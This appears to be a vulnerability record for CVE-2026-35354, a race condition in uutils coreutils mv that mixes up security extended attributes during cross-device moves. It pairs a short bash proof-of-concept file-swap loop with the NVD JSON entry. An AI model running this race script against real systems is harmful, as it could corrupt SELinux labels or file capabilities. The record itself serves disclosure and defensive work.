CVE-2026-35354

#!/bin/bash # PoC for CVE-2026-35354: TOCTOU in uutils coreutils mv # This script attempts to exploit the race condition during cross-device moves. TARGET_DIR="/tmp/cve_test" SRC_FILE="$TARGET_DIR/secret_file" DST_FILE="$TARGET_DIR/public_file" # Setup: Create files with different extended attributes mkdir -p "$TARGET_DIR" touch "$SRC_FILE" "$DST_FILE" # Set a restrictive SELinux label (simulated) on the source file # In a real exploit, this would be a sensitive security context echo "Setting sensitive xattr on source file..." # user.security.label="high_security" # The victim runs a cross-device move (simulated loop) # Attacker runs this swap loop concurrently echo "Starting race condition attack..." while true; do # Check if mv is in progress (heuristic) # Swap the files between the check and use of xattrs mv "$DST_FILE" "$TARGET_DIR/temp_swap" && \ mv "$SRC_FILE" "$DST_FILE" && \ mv "$TARGET_DIR/temp_swap" "$SRC_FILE" # Sleep briefly to allow CPU for mv process sleep 0.001 done

{"cve": {"id": "CVE-2026-35354", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:37.867", "lastModified": "2026-04-24T19:04:08.917", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Time-of-Check to Time-of-Use (TOCTOU) vulnerability exists in the mv utility of uutils coreutils during cross-device moves. The extended attribute (xattr) preservation logic uses multiple path-based system calls that perform fresh path-to-inode lookups for each operation. A local attacker with write access to the directory can exploit this race to swap files between calls, causing the destination file to receive an inconsistent mix of security xattrs, such as SELinux labels or file capabilities."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:*", "matchCriteriaId": "4A9AF9E4-E17C-48AD-8051-B49998618839"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/issues/10014", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/uutils/coreutils/issues/10014", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}